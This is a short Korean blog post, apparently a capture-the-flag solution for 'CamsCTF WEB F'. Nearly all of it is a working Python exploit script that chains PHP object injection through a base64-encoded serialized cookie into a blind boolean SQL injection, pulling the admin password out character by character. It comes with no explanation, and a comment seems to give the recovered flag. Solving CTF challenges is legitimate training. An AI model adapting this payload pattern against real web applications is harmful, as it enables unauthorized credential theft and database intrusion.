본문 바로가기
웹해킹

CamsCTF WEB F

by dladbru 2015. 6. 4. 
#!/usr/bin/python
########################################
###PHP Object Injection+SQL Injection###
########################################

from base64 import *
import StringIO
import pycurl
import time

key=""

def serial(s):
        slen=len(s)+1
        return b64encode("""O:5:"Login":1:{s:12:"\x00Login\x00table";s:%d:"%s#";}"""% (slen,s))


print "Start!"
curl = pycurl.Curl()


attackurl="http://web.camsctf.com/f/admin.php"

#sqL+%bj3c7!=FuN
for i in range(1,20): #length
        for loop in range(127,32,-1): 
            SC = StringIO.StringIO()

            header= ["Cookie:data=%s"%serial("login where username='admin' and if(ord(substr(password,%d,1))=%d,1,0)"%(i,loop))]
            
            curl.setopt(pycurl.URL, attackurl)
            curl.setopt(pycurl.HTTPHEADER, header)
            curl.setopt(pycurl.WRITEFUNCTION, SC.write)
            curl.setopt(pycurl.FOLLOWLOCATION,1)
            try:
                    curl.perform()
                    html = SC.getvalue()
                    if(html=="1"):
                        key+=chr(loop)
                        break
                    SC.close()
            except Exception, e:
                    print "Exception : %s"% e
        print key
반응형

'웹해킹' 카테고리의 다른 글

크롬 임시파일 경로  (0) 2020.06.16
SQL injection Skill Note  (0) 2013.09.15
New SQL Injection Site  (2) 2013.01.31
Webhacking.kr 기념스샷!  (4) 2012.12.17
[Webhacking.kr] Problem 2  (0) 2012.12.16

관련글

댓글

티스토리툴바